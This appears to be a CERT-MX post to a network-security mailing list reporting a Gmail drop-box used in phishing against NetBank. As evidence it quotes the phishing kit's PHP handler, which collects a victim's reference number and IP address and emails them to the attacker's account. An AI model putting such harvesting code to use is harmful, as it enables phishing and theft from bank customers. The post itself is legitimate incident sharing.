[nsp-sec] Gmail phishing drop-box (NetBank)

[David Jiménez]

Hi Folks,

The account mail2smith2002 at gmail.com was found in a phishing case against
NetBank (ZA) in Mexico.

Evidence:
////////////////////////////////////////////////////////
<?php
error_reporting(0);

$error = '';

if(isset($_POST['ref'])){

    if(trim($_POST['reference']) == ""){
        $error = '- Please enter a valid Reference Number';
    }
    else if(strlen($_POST['reference']) > 10){
        $error = '- Invalid Reference Number';
    }
    else if(strlen($_POST['reference']) < 5){
        $error = '- Reference Number is Invalid';
    }
         else {
                $to = 'mail2smith2002 at gmail.com';
                $ip = getenv("REMOTE_ADDR");
                $subject = 'Rendurance '.$ip;
                $msg = 'Ref:  '.$_POST['reference'].'
                        <br><br>';
                $msg .= 'IP:'.$ip.'  ';

                $headers  = 'MIME-Version: 1.0' . "\r\n";
                $headers .= 'Content-type: text/html; charset=iso-8859-1' .
"\r\n";
                $headers .= 'From: domain' . "\r\n" .
                    'X-Mailer: PHP/' . phpversion();
                    if(mail($to,$subject,$msg,$headers))
                    {
                        echo '<script type="text/javascript">
                        top.location = "loading.php"
                        </script>';

                    }   else {
                        die("Cannot Send Email");

                }
        }

}

Kind Regards
-- 

---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188